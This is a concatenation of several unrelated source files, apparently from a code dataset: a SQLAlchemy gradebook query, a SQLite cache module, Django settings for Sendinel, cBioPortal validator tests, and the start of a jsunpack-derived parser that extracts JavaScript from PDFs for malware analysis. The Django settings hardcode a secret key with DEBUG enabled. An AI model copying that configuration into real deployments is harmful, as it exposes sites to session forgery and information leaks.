code_scores = self.db.query(
SubmittedNotebook.id,
func.sum(Grade.score).label("code_score"),
func.sum(GradeCell.max_score).label("max_code_score"),
).join(SubmittedAssignment, Notebook, Assignment, Student, Grade, GradeCell)\
.filter(GradeCell.cell_type == "code")\
.group_by(SubmittedNotebook.id)\
.subquery()
# subquery for the written scores
written_scores = self.db.query(
SubmittedNotebook.id,
func.sum(Grade.score).label("written_score"),
func.sum(GradeCell.max_score).label("max_written_score"),
).join(SubmittedAssignment, Notebook, Assignment, Student, Grade, GradeCell)\
.filter(GradeCell.cell_type == "markdown")\
.group_by(SubmittedNotebook.id)\
.subquery()
# subquery for needing manual grading
manual_grade = self.db.query(
SubmittedNotebook.id,
exists().where(Grade.needs_manual_grade).label("needs_manual_grade")
).join(SubmittedAssignment, Assignment, Notebook)\
.filter(
Grade.notebook_id == SubmittedNotebook.id,
Grade.needs_manual_grade)\
.group_by(SubmittedNotebook.id)\
.subquery()
# subquery for failed tests
failed_tests = self.db.query(
SubmittedNotebook.id,
exists().where(Grade.failed_tests).label("failed_tests")
).join(SubmittedAssignment, Assignment, Notebook)\
.filter(
Grade.notebook_id == SubmittedNotebook.id,
Grade.failed_tests)\
.group_by(SubmittedNotebook.id)\
.subquery()
# full query
submissions = self.db.query(
SubmittedNotebook.id, Notebook.name, Student.id,
func.sum(Grade.score), func.sum(GradeCell.max_score),
code_scores.c.code_score, code_scores.c.max_code_score,
written_scores.c.written_score, written_scores.c.max_written_score,
func.coalesce(manual_grade.c.needs_manual_grade, False),
func.coalesce(failed_tests.c.failed_tests, False),
SubmittedNotebook.flagged
).join(SubmittedAssignment, Notebook, Assignment, Student, Grade, GradeCell)\
.outerjoin(code_scores, SubmittedNotebook.id == code_scores.c.id)\
.outerjoin(written_scores, SubmittedNotebook.id == written_scores.c.id)\
.outerjoin(manual_grade, SubmittedNotebook.id == manual_grade.c.id)\
.outerjoin(failed_tests, SubmittedNotebook.id == failed_tests.c.id)\
.filter(and_(
Notebook.name == notebook_id,
Assignment.name == assignment_id,
Student.id == SubmittedAssignment.student_id,
SubmittedAssignment.id == SubmittedNotebook.assignment_id,
SubmittedNotebook.id == Grade.notebook_id,
GradeCell.id == Grade.cell_id))\
.group_by(Student.id)\
.all()
keys = [
"id", "name", "student",
"score", "max_score",
"code_score", "max_code_score",
"written_score", "max_written_score",
"needs_manual_grade",
"failed_tests", "flagged"
]
return [dict(zip(keys, x)) for x in submissions]
| bsd-3-clause | -7,452,875,962,685,538,000 | 33.431348 | 109 | 0.607026 | false | 4.415136 | false | false | false |
allefilmskijken/afk | script.module.image_cache/lib/local_lib/db_utils.py | 1 | 3832 | """
Image Cache Module
Copyright (C) 2016 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import json
from sqlite3 import dbapi2 as db_lib
def __enum(**enums):
return type('Enum', (), enums)
DB_TYPES = __enum(MYSQL='mysql', SQLITE='sqlite')
class DBCache(object):
def __init__(self, db_path=None):
self.db_path = '../tmdb_cache.db' if db_path is None else db_path
self.db_type = DB_TYPES.SQLITE
self.db = db_lib.connect(self.db_path)
self.db.text_factory = str
self.__execute('CREATE TABLE IF NOT EXISTS api_cache (tmdb_id INTEGER NOT NULL, object_type CHAR(1) NOT NULL, data VARCHAR(255), PRIMARY KEY(tmdb_id, object_type))')
self.__execute('CREATE TABLE IF NOT EXISTS db_info (setting VARCHAR(255), value TEXT, PRIMARY KEY(setting))')
def close(self):
self.db.close()
def update_movie(self, tmdb_id, js_data):
self.__update_object(tmdb_id, 'M', js_data)
def get_movie(self, tmdb_id):
return self.__get_object(tmdb_id, 'M')
def get_tvshow(self, tmdb_id):
return self.__get_object(tmdb_id, 'T')
def get_person(self, tmdb_id):
return self.__get_object(tmdb_id, 'P')
def __get_object(self, tmdb_id, object_type):
sql = 'SELECT data from api_cache where tmdb_id = ? and object_type=?'
rows = self.__execute(sql, (tmdb_id, object_type))
if rows:
return json.loads(rows[0][0])
else:
return {}
def update_tvshow(self, tmdb_id, js_data):
self.__update_object(tmdb_id, 'T', js_data)
def update_person(self, tmdb_id, js_data):
self.__update_object(tmdb_id, 'P', js_data)
def __update_object(self, tmdb_id, object_type, js_data):
self.__execute('REPLACE INTO api_cache (tmdb_id, object_type, data) values (?, ?, ?)', (tmdb_id, object_type, json.dumps(js_data)))
def get_setting(self, setting):
sql = 'SELECT value FROM db_info WHERE setting=?'
rows = self.__execute(sql, (setting,))
if rows:
return rows[0][0]
def set_setting(self, setting, value):
sql = 'REPLACE INTO db_info (setting, value) VALUES (?, ?)'
self.__execute(sql, (setting, value))
def execute(self, sql, params=None):
return self.__execute(sql, params)
def __execute(self, sql, params=None):
if params is None: params = []
rows = None
sql = self.__format(sql)
is_read = self.__is_read(sql)
cur = self.db.cursor()
cur.execute(sql, params)
if is_read:
rows = cur.fetchall()
cur.close()
self.db.commit()
return rows
# apply formatting changes to make sql work with a particular db driver
def __format(self, sql):
if self.db_type == DB_TYPES.MYSQL:
sql = sql.replace('?', '%s')
if self.db_type == DB_TYPES.SQLITE:
if sql[:7] == 'REPLACE':
sql = 'INSERT OR ' + sql
return sql
def __is_read(self, sql):
fragment = sql[:6].upper()
return fragment[:6] == 'SELECT' or fragment[:4] == 'SHOW'
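# Usage sketch (hypothetical path and data, not part of the original module):
#
#     cache = DBCache('/tmp/tmdb_cache.db')
#     cache.update_movie(603, {'title': 'The Matrix'})
#     data = cache.get_movie(603)          # -> {'title': 'The Matrix'}
#     cache.set_setting('db_version', '1')
#     cache.close()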
| gpl-2.0 | 8,710,367,638,605,920,000 | 35.150943 | 173 | 0.595251 | false | 3.628788 | false | false | false |
Sendinel/Sendinel | sendinel/settings.py | 1 | 5769 | import logging
from datetime import timedelta
from os.path import abspath, dirname
# Django settings for sendinel project.
DEBUG = True #for scheduling set to false
TEMPLATE_DEBUG = DEBUG
PROJECT_PATH = dirname(abspath(__file__))
LOGGING_LEVEL = logging.INFO
LOGGING_LEVEL_TEST = logging.CRITICAL
ADMINS = (
)
MANAGERS = ADMINS
DATABASE_ENGINE = 'sqlite3' # 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
DATABASE_NAME = PROJECT_PATH + '/sendinel.db' # Or path to database file if using sqlite3.
DATABASE_USER = '' # Not used with sqlite3.
DATABASE_PASSWORD = '' # Not used with sqlite3.
DATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.
DATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'Europe/Berlin'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
_ = lambda s: s
#LANGUAGES = (
# ('de', _('German')),
# ('en', _('English')),
# ('ts', _('Shangaan')),
# ('zh', _('Test Language')),
#)
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = PROJECT_PATH + '/media'
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/mediaweb/'
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/admin_media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = '4ztf1p=e9d*ns^d*f@bs3mu#37p)$jp(%lzo2a+-%j8^=eq852'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source',
# 'django.template.loaders.eggs.load_template_source',
)
TEMPLATE_CONTEXT_PROCESSORS = ("django.core.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.contrib.messages.context_processors.messages")
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.csrf.middleware.CsrfMiddleware'
)
ROOT_URLCONF = 'sendinel.urls'
TEMPLATE_DIRS = (
PROJECT_PATH + "/templates",
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'sendinel',
'sendinel.web',
'sendinel.backend',
'sendinel.groups',
'sendinel.infoservices',
'sendinel.notifications',
'sendinel.medicines'
)
####################################
# Sendinel Configuration
REMINDER_TIME_BEFORE_APPOINTMENT = timedelta(days = 1)
DEFAULT_APPOINTMENT_DURATION = timedelta(minutes = 60)
DEFAULT_HOSPITAL_NAME = 'your hospital'
DEFAULT_SEND_TIME = '12:00' #hh:mm in 24-hours format
COUNTRY_CODE_PHONE = "0049" #"0027" for South Africa
START_MOBILE_PHONE = "0" # "0" for South Africa (07/08..), "01" for Germany
# see http://en.wikipedia.org/wiki/Telephone_numbers_in_South_Africa
# TODO multiple mobile prefixes
ASTERISK_USER = "sendinel"
ASTERISK_GROUP = "sendinel"
ASTERISK_SPOOL_DIR = "/var/spool/asterisk/outgoing/"
ASTERISK_DONE_SPOOL_DIR = "/var/spool/asterisk/outgoing_done/"
ASTERISK_RETRY = 5
ASTERISK_RETRY_TIME = 5
# authentication settings: used to turn it on and off
ASTERISK_DATACARD = True
ASTERISK_EXTENSION = "s"
ASTERISK_SIP_ACCOUNT = "datacard0"
#ASTERISK_SIP_ACCOUNT = "ext-sip-account"
# Specify a COM Port for SMS
# for windows maybe it starts at 0
SERIALPORTSMS = '/dev/rfcomm0'
# FESTIVAL_CACHE = "/lib/init/rw"
FESTIVAL_CACHE = "/tmp"
# Phonenumber to authenticate against the system
AUTH_NUMBER = "CHANGE ME"
# time a user has to call the system to authenticate
AUTHENTICATION_CALL_TIMEOUT = timedelta(minutes = 3)
# True or False to turn authentication on or off
AUTHENTICATION_ENABLED = False
# enable Bluetooth as a Way of Communication
BLUETOOTH_ENABLED = True
# Salutation for all SMS
# TODO the count of characters has to be subtracted from "Characters Left:"
SMS_SALUTATION = ''
# Salutation for phone calls
CALL_SALUTATION = "This is an automated call from your clinic"
# Template for Medicine Notification Messages
MEDICINE_MESSAGE_TEMPLATE = "Your medicine is now available " + \
"at the $hospital. Please come and pick it up."
# used for marking the vcal uid
VCAL_UID_SLUG = 'sendinel.org'
####################################
# Setup Local_Settings if present
try:
from local_settings import *
except ImportError:
pass
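# A local_settings.py module next to this file can override any of the values
# above; e.g. it might contain (hypothetical values):
#
#     DEBUG = False
#     AUTH_NUMBER = "0271234567"
#     BLUETOOTH_ENABLED = False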
| mit | -7,652,383,964,260,054,000 | 30.697802 | 108 | 0.704802 | false | 3.363848 | false | false | false |
pughlab/cbioportal | core/src/test/scripts/system_tests_validate_studies.py | 3 | 7336 | #!/usr/bin/env python3
"""
Copyright (c) 2018 The Hyve B.V.
This code is licensed under the GNU Affero General Public License (AGPL),
version 3, or (at your option) any later version.
"""
import unittest
import sys
import os
import glob
from contextlib import contextmanager
from io import StringIO
import logging.handlers
import tempfile
import shutil
from importer import validateStudies, cbioportal_common
# globals:
PORTAL_INFO_DIR = 'test_data/api_json_system_tests'
# FIXME: replace by contextlib.redirect_stdout when moving to Python 3.4+
@contextmanager
def redirect_stdout(new_target):
"""Temporarily re-bind sys.stdout to a different file-like object."""
old_target = sys.stdout
sys.stdout = new_target
try:
yield
finally:
sys.stdout = old_target
# FIXME: replace by tempfile.TemporaryDirectory when moving to Python 3.2+
@contextmanager
def TemporaryDirectory():
"""Create a temporary directory and remove it after use."""
path = tempfile.mkdtemp()
try:
yield path
finally:
shutil.rmtree(path)
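# Usage sketch for the two helpers above (variable names are illustrative; the
# tests below combine them the same way):
#
#     with TemporaryDirectory() as out_dir:
#         with redirect_stdout(StringIO()):
#             pass  # run the validator, then inspect files written to out_dir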
class ValidateStudiesSystemTester(unittest.TestCase):
"""Test cases around running the validateStudies script
(such as "does it return the correct exit status?")
"""
def test_exit_status_success(self):
"""study 0 : no errors, expected exit_status = 0.
Possible exit statuses:
0: 'VALID',
1: 'INVALID'
"""
# Build up arguments and run
print("===study 0")
args = ['--list-of-studies', 'test_data/study_es_0/',
'--portal_info_dir', PORTAL_INFO_DIR]
args = validateStudies.interface(args)
exit_status = validateStudies.main(args)
self.assertEqual(0, exit_status)
def test_exit_status_failure(self):
"""study 1 : errors, expected exit_status = 1."""
# Build up arguments and run
print("===study 1")
args = ['--list-of-studies', 'test_data/study_es_1/',
'--portal_info_dir', PORTAL_INFO_DIR]
args = validateStudies.interface(args)
exit_status = validateStudies.main(args)
self.assertEqual(1, exit_status)
def test_exit_status_invalid(self):
"""test to fail: study directory not existing, so cannot run validation, expected exit_status = 1."""
# Build up arguments and run
print("===study invalid")
args = ['--list-of-studies', 'test_data/study_es_invalid/',
'--portal_info_dir', PORTAL_INFO_DIR]
args = validateStudies.interface(args)
exit_status = validateStudies.main(args)
self.assertEqual(1, exit_status)
def test_exit_status_warnings(self):
"""study 3 : warnings only, expected exit_status = 0."""
# Build up arguments and run
print("===study 3")
args = ['--list-of-studies', 'test_data/study_es_3/',
'--portal_info_dir', PORTAL_INFO_DIR]
args = validateStudies.interface(args)
exit_status = validateStudies.main(args)
self.assertEqual(0, exit_status)
def test_exit_status_multiple_studies(self):
"""Running validateStudies for four studies tested above, expected exit_status = 1."""
# Build up arguments and run
print("===study0,1,invalid,3")
args = ['--root-directory', 'test_data',
'--list-of-studies', 'study_es_0,study_es_1,study_es_invalid,study_es_3',
'--portal_info_dir', PORTAL_INFO_DIR]
args = validateStudies.interface(args)
exit_status = validateStudies.main(args)
self.assertEqual(1, exit_status)
def test_logs_study_label_before_validation_messages(self):
"""The log file should start with a line describing the study.
A subsequent study should have its own header line.
"""
# given
with TemporaryDirectory() as out_dir_path:
args = [
'--root-directory', 'test_data',
'--list-of-studies', 'study_various_issues,study_es_0',
'--portal_info_dir', PORTAL_INFO_DIR,
'--html-folder', out_dir_path
]
# when
with redirect_stdout(StringIO()):
parsed_args = validateStudies.interface(args)
validateStudies.main(parsed_args)
# then
log_file_path = glob.glob(os.path.join(out_dir_path, 'log*.txt'))[0]
with open(log_file_path) as log_file:
log_file_lines = log_file.readlines()
self.assertIn('study_various_issues', log_file_lines[0])
last_line_of_first_study = next(
index
for index, line
in enumerate(log_file_lines)
if 'Validation complete' in line)
self.assertIn(
'study_es_0',
log_file_lines[last_line_of_first_study + 1])
class ValidateStudiesWithEagerlyFlushingCollapser(unittest.TestCase):
"""Test validation with the collapser flushing due to buffer capacity.
When validating very large studies, it will flush partway through a study.
This can be simulated with a smaller study by lowering the buffer capacity.
"""
def setUp(self):
"""Make the collapsing log message handler flush more eagerly."""
class EagerFlusher(logging.handlers.MemoryHandler):
def __init__(self, *args, **kwargs):
"""Set the buffer capacity to 3 regardless of args."""
# leave out any capacity argument from args and kwargs
args = args[1:]
kwargs = {k: v for k, v in list(kwargs.items()) if k != 'capacity'}
# pass 3 as the capacity argument
super(EagerFlusher, self).__init__(3, *args, **kwargs)
class EagerFlushingCollapser(
cbioportal_common.CollapsingLogMessageHandler,
EagerFlusher):
"""CollapsingLogMessageHandler with EagerFlusher overrides."""
pass
self.original_collapser = cbioportal_common.CollapsingLogMessageHandler
cbioportal_common.CollapsingLogMessageHandler = EagerFlusher
def tearDown(self):
"""Restore the unmodified collapsing log message handler."""
cbioportal_common.CollapsingLogMessageHandler = self.original_collapser
def test_leaves_stdout_uncluttered_if_validation_produces_errors(self):
"""Test flushing the collapsing logger halfway through a study.
This should not spill the validation messages to stdout as it previously
did, even crashing with a KeyError sometimes because non-validator
log messages got flushed into the collapsing logic.
"""
output_stream = StringIO()
with redirect_stdout(output_stream):
args = validateStudies.interface([
'--root-directory', 'test_data',
'--list-of-studies', 'study_various_issues/',
'--portal_info_dir', PORTAL_INFO_DIR])
validateStudies.main(args)
self.assertNotIn(
'ERROR',
output_stream.getvalue(),
'The validation errors should not be printed to the console.')
if __name__ == '__main__':
unittest.main(buffer=True)
| agpl-3.0 | 3,534,768,252,649,040,400 | 36.050505 | 109 | 0.615867 | false | 3.99782 | true | false | false |
trogdorsey/olivia | olivia/olivia.py | 1 | 57346 | '''
Fork of pdf.py from jsunpack
'''
import binascii
import cStringIO
import Crypto.Cipher.ARC4 as ARC4
import Crypto.Cipher.AES as AES
import hashlib
import lzw
import re
import string
import struct
import xml.dom.minidom
import zlib
class pdfobj(object):
#this class parses single "1 0 obj" up till "endobj" elements
def __init__(self, keynum, data):
self.tags = [] #tuples of [key,value]
self.keynum = keynum
self.indata = data
self.tagstream = ''
self.tagstreamError = False
self.tagstreamChanged = False
self.hiddenTags = 0 #tags containing non-normalized data
self.children = [] #if this has a script tag, parse children of it
self.staticScript = '' #for those things not within objects append to this structure
#special children types
self.isJS = False #could be a reference (or self contains JS)
self.isDelayJS = False #for OpenAction
self.isEmbedded = False #for /EmbeddedFile
self.isAnnot = False
self.isObjStm = []
self.is_xfa = False
self.is_xfaData = False
self.isEncrypt = False
self.isFromObjStream = False
self.contains_comment = False
self.knownName = '' #related to annots
self.subj = '' #related to annots
self.doc_properties = []
#self.isTitle = False
#self.isKeywords = False
self.xfaChildren = []
if self.indata:
self.parseObject()
def __repr__(self):
out = 'pdfobj %s\n' % (self.keynum)
if self.children:
out += '\tchildren %s\n' % (str(self.children))
if self.isJS:
out += '\tisJS'
if self.isAnnot:
out += '\tisAnnot'
for doc_prop in self.doc_properties:
out += '\tis%s' % doc_prop
if self.isDelayJS:
out += '\tisDelayJS'
return out
def parseTag(self, tag, stream):
'''
Input: tag is the contents of /Tag1 value1 /Tag2 value2
stream is (optional) contents between stream and endstream
Output: self.tags and self.tagstream
If stream is not set, then we should set it before it gets assigned to tagstream
'''
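        # Illustrative example (hypothetical dictionary, not from a real PDF):
        # parsing ``/S /JavaScript /JS (this.closeDoc();)`` yields tag entries
        # for ``S``, ``JavaScript`` and ``JS``, with the script body captured
        # for ``JS`` through the TAGVALCLOSED state below.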
state = 'INIT'
precomment_state = 'INIT'
curtag = ''
curval = ''
multiline = 0 # for tracking multiline in TAGVALCLOSED state
uncleaned_tags = [] #output of statemachine
num_paren_open = 0
is_bracket_closed = True
for index in range(0, len(tag)):
#if self.keynum == '23 0':
# print state, index, hex(index), hex(ord(tag[index])), tag[index], curtag, len(curval), num_paren_open, is_bracket_closed
if state == 'INIT':
is_bracket_closed = True
if tag[index] == '/':
state = 'TAG'
elif state == 'TAG':
is_bracket_closed = True
if re.match('[a-zA-Z0-9#]', tag[index]):
curtag += tag[index]
elif tag[index] == '/':
if curtag:
uncleaned_tags.append([state, curtag, '']) # no tag value
curtag = ''
state = 'TAG'
elif tag[index] == '(':
state = 'TAGVALCLOSED'
num_paren_open = 0
multiline = 0
curval = '' # ignore the (, for the most part
elif tag[index] == '[': # start of an array... probably
state = 'TAGVAL'
is_bracket_closed = False
curval = '['
elif tag[index] == '\n':
state = 'TAG'
elif tag[index] == '%':
precomment_state = state
state = 'COMMENT'
else:
state = 'TAGVAL'
curval = ''
elif state == 'COMMENT':
self.contains_comment = True
if tag[index] in ['\x0d', '\x0a']:
state = precomment_state
elif state == 'TAGVAL':
# Weird cases with arrays
if tag[index] == '/' and (not tag[index - 1] == '\\\\') and \
((curval and curval[0] == '[' and is_bracket_closed) or \
(not curval) or (curval and curval[0] != '[')):
# a new open bracket and we are not in the middle of a bracket
# or there is bracket here, but we ignore this one
if curtag or curval:
uncleaned_tags.append([state, curtag, curval])
state = 'TAG'
curtag = curval = ''
elif curval and curval[0] == '[' and tag[index] == ']': # finished array
curval += tag[index]
is_bracket_closed = True
elif tag[index] == '(':
#what do we do with curval? toss it
if re.match(r'^[\s\[\]\(\)<>]*$', curval): # look for any characters that indicate this isn't a TAGVALCLOSED
state = 'TAGVALCLOSED'
multiline = 0
if curtag in ['JS', 'O', 'U']:
num_paren_open += 1
if len(curval) > 0:
#print '\ttossed out %d characters (%s) because we entered TAGVALCLOSED state' % (len(curval),curval)
curval = ''
else: #keep processing?
curval += tag[index]
elif tag[index] == '[' and curtag == 'XFA': # coming up on an array listing the XFA objects
is_bracket_closed = False
state = 'TAGVALCLOSED'
# Normally ignore these, but they are useful when parsing the ID in the trailer
elif (tag[index] == '<' or tag[index] == '>') and self.keynum != 'trailer':
pass
elif tag[index] == ' ' and curval == '':
pass #already empty
elif tag[index] == '%':
precomment_state = state
state = 'COMMENT'
else:
curval += tag[index]
elif state == 'TAGVALCLOSED':
#in this state we know that the code started with (... therefore we can't end until we see )
#the code could also have enclosed ( chars; therefore, this algorithm is greedy
grab_more = 0 # if grab_more is set to 1, it means the tag isn't closing yet
if tag[index] == ')': #possible closing tag
if (tag[index - 1] == '\\' and tag[index-2] != '\\') or \
(tag[index-1] == '\\' and tag[index-2] == '\\' and tag[index-3] == '\\') or \
((curtag == 'JS' or curtag == 'JavaScript') and num_paren_open > 0 and tag[index-1] == '\\') or \
(curtag == 'XFA' and not is_bracket_closed): # we are in the middle of a JS string or an XFA array
grab_more = 1
if num_paren_open > 0:
num_paren_open -= 1
elif multiline: #tricky cases
#either a newline or "(" character leads us here.
#IGNORE THESE
#if re.match('^\)\s*($|\n\s*([^\)\s])',tag[index:]):
# #yep its closing time
# #this regex ensures there isn't another following close tag
#res = re.match('^(.*)\) $',tag[index:])
if index + 1 < len(tag):
indexParen = tag[index + 1:].find(')')
#indexNewL = tag[index+1:].find('\n')
if indexParen > -1: # and (indexNewL == -1 or indexNewL > indexParen):
if not re.match('^\s*\/[A-Za-z0-9]+\s*\(', tag[index + 1:]):
grab_more = 1
if grab_more:
curval += tag[index]
else: #ok ok, its simply closing
uncleaned_tags.append([state, curtag, curval])
state = 'INIT'
#print '%s (TAGVALCLOSED), length=%d bytes with %d/%d completed (around %s)' % (curtag, len(curval),index,len(tag), tag[index-20:index+20])
curtag = curval = ''
elif tag[index] == '(': #tag[index] == '\n'
num_paren_open += 1
curval += tag[index]
elif tag[index] == ']' and curtag != 'JS' and not is_bracket_closed: # can have ]s inside JS strings...
is_bracket_closed = True
elif tag[index] == '%' and num_paren_open == 0 and curtag not in ['JS', 'O', 'U']: #can have % inside JS strings... And in O and U strings in Encrypt Objects
precomment_state = state
state = 'COMMENT'
else:
curval += tag[index]
else:
print 'invalid state in parseTag: %s' % state
if curtag: #an ending tag with NO final separator
uncleaned_tags.append(['ENDTAG', curtag, curval])
#clean uncleaned_tags and put in self.tags instead
for source, tagtype, tagdata in uncleaned_tags:
newtagtype = pdfobj.fixPound(tagtype)
if newtagtype != tagtype:
self.hiddenTags += 1
tagtype = newtagtype
#newlines in tagtype? ONLY for state != TAGVALCLOSED
if source != 'TAGVALCLOSED':
#its okay to replace newlines, spaces, tabs here
tagdata = re.sub('[\s\r\n]+', ' ', tagdata)
# You can have octal further in the string, but that can sometimes cause problems
# so if there is a problem, just back out and use the original
if re.search('([^\\\\]\\\\[0-9]{3}\s*)+', tagdata): #ie. need to convert \040 == 0x20
original = tagdata
try:
tagdata = re.sub('\\\\([0-9]{3})', lambda mo: chr(int(mo.group(1), 8)), tagdata)
except:
tagdata = original
# to my dismay, there are lot of tags to unescape
unescaped_tagdata = ''
backslash = False
for d in tagdata:
if backslash:
backslash = False
if d == 'b':
unescaped_tagdata += '\b'
elif d == 'f':
unescaped_tagdata += '\f'
elif d == 'n':
unescaped_tagdata += '\n'
elif d == 'r':
unescaped_tagdata += '\r'
elif d == 's':
unescaped_tagdata += 's' # this one is weird, I know
elif d == 't':
unescaped_tagdata += '\t'
elif d in ('(', ')', '\\'):
unescaped_tagdata += d
elif d == '\'' and tagtype == 'JS':
unescaped_tagdata += '\\\''
elif d == '\\':
backslash = True
else:
unescaped_tagdata += d
tagdata = unescaped_tagdata
#print 'set stream to %s; %s; %d bytes' % (source, tagtype, len(tagdata))
#sometimes it's a short snippet without a ; at the end. So add a ;
if len(tagdata) < 50 and tagdata.find('AFDate') != -1 and tagdata[-1] != ';':
tagdata += ';'
# Only really want the JavaScript, and then only when it's not in a unicode format
if not stream and \
(source == 'TAGVALCLOSED' or source == 'ENDTAG') and \
(tagtype == 'JS' or tagtype == 'JavaScript') and \
len(tagdata) > 2 and tagdata[0:2] != '\xfe\xff':
stream = tagdata
self.tags.append([source, tagtype, tagdata])
self.tagstream = stream
if olivia.DEBUG:
print 'obj %s: ' % (self.keynum)
for source, tagtype, tagdata in self.tags:
tagtxt = '\ttag %s' % re.sub('\n', '', tagtype)
if len(tagdata) > 30:
tagtxt += ' = [data %d bytes]' % len(tagdata)
elif tagdata:
tagtxt += ' = '
for c in tagdata:
if c in string.printable and c != '\n':
tagtxt += c
else:
tagtxt += '\\x%02x' % (ord(c))
print '%-50s (%s)' % (tagtxt, source)
#end
def parseChildren(self):
'''
Input: self.tags (must be populated)
Output: self.children
'''
for state, k, kval in self.tags:
hasRef = re.search('\+?(\d+)\s+\+?(\d+)\s+R', kval)
if hasRef:
objkey = hasRef.group(1) + ' ' + hasRef.group(2)
self.children.append([k, objkey])
if k == 'XFA':
kids = re.findall('(\d+\s+\d+)\s+R', kval)
for kid in kids:
self.xfaChildren.append([k, kid])
def parseObject(self):
#previously this was non-greedy, but js with '>>' does mess things up in that case
#to solve the problem, do both
#if olivia.DEBUG:
# print '\tstarting object len %d' % len(self.indata)
tags = re.findall('<<(.*)>>[\s\r\n%]*(?:stream[\s\r\n]*(.*?)[\r\n]*endstream)?', self.indata, re.MULTILINE | re.DOTALL | re.IGNORECASE)
if tags:
for tag, stream in tags:
gttag = tag.find('>>')
streamtag = tag.find('stream')
endstream_tag_end = self.indata.rfind('endstream')
endstream_tag_begin = self.indata.find('endstream')
#
# This means that there was an improper parsing because the tag shouldn't contain a stream object
if endstream_tag_end != -1 and 0 < gttag < streamtag:
# do this in case the word stream is in the tag data somewhere...
stream_location_match = re.search('>>[\s\r\n%]*stream?', self.indata, re.MULTILINE | re.DOTALL | re.IGNORECASE)
if stream_location_match:
stream_location = stream_location_match.start()
else:
stream_location = self.indata.find('stream')
stream_start = self.indata.find('stream', stream_location)
stream_match = re.search('stream[\s\r\n]*(.*?)[\r\n]*endstream', self.indata, re.MULTILINE | re.DOTALL | re.IGNORECASE)
stream_data = ''
					# Only search up to the start of the stream; a compressed stream can contain '>>', which would throw off the regex
tag_match = re.search('<<(.*)>>', self.indata[0:stream_start], re.MULTILINE | re.DOTALL | re.IGNORECASE)
if tag_match and stream_match:
stream_data = stream_match.group(1)
tag = tag_match.group(1)
tags = [(tag, stream_data)]
#
# This checks if the word endstream happens inside the stream
if endstream_tag_begin != -1 and endstream_tag_begin != endstream_tag_end:
stream_location_match = re.search('>>[\s\r\n%]*stream?', self.indata, re.MULTILINE | re.DOTALL | re.IGNORECASE)
if stream_location_match:
stream_location = stream_location_match.start()
else:
stream_location = self.indata.find('stream')
stream_start = self.indata.find('stream', stream_location)
stream_match = re.search('stream[\s\r\n]*(.*?)[\r\n]*endstream$', self.indata, re.MULTILINE | re.DOTALL | re.IGNORECASE)
tag_match = re.search('<<(.*)>>', self.indata[0:stream_start], re.MULTILINE | re.DOTALL | re.IGNORECASE)
stream_data = ''
if stream_match and tag_match:
stream_data = stream_match.group(1)
tag = tag_match.group(1)
tags = [(tag, stream_data)]
if not tags: #Error parsing object!
return
for tag, stream in tags:
self.parseTag(tag, stream)
self.parseChildren()
@staticmethod
def fixPound(i):
#returns '#3a' substituted with ':', etc
#strips newlines, '[', and ']' characters
#this allows indexing in arrays
i = re.sub('[\[\]\n]', '', i)
i = re.sub('<<$', '', i)
return re.sub('#([a-fA-F0-9]{2})', lambda mo: chr(int('0x' + mo.group(1), 0)), i)
@staticmethod
def lzwdecode(data):
try:
return ''.join(lzw.LZWDecoder(cStringIO.StringIO(data)).run())
except:
return data
@staticmethod
def rldecode(input):
output = ''
index = 0
try:
key_len = ord(input[index])
while key_len != 0x80:
index += 1
if key_len & 0x80:
output += input[index] * (256 - key_len + 1)
index += 1
else:
output += input[index:index + key_len + 1]
index += key_len + 1
key_len = ord(input[index])
except:
return input
return output
@staticmethod
def ascii85(input):
outdata = ''
input = re.sub('\s', '', input)
input = re.sub('^<~', '', input)
input = re.sub('~>$', '', input)
for i in range(0, len(input), 5):
bytes = input[i:i + 5]
fraglen = len(bytes)
if bytes[0] == 'z':
pass #ignore
if bytes[0] == 'y':
pass #ignore
if i + 5 >= len(input):
#data not divisible by 5
bytes = input[i:]
fraglen = len(bytes)
if fraglen > 1:
bytes += 'vvv'
total = 0
shift = 85 * 85 * 85 * 85
for c in bytes:
total += shift * (ord(c) - 33)
shift /= 85
if fraglen > 1:
outdata += chr((total >> 24) % 256)
if fraglen > 2:
outdata += chr((total >> 16) % 256)
if fraglen > 3:
outdata += chr((total >> 8) % 256)
if fraglen > 4:
outdata += chr((total) % 256)
return outdata
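# Illustrative sketch (not part of the original parser): the static decoders on
# pdfobj can be exercised on their own. The inputs below are made-up samples.
def _example_static_decoders():
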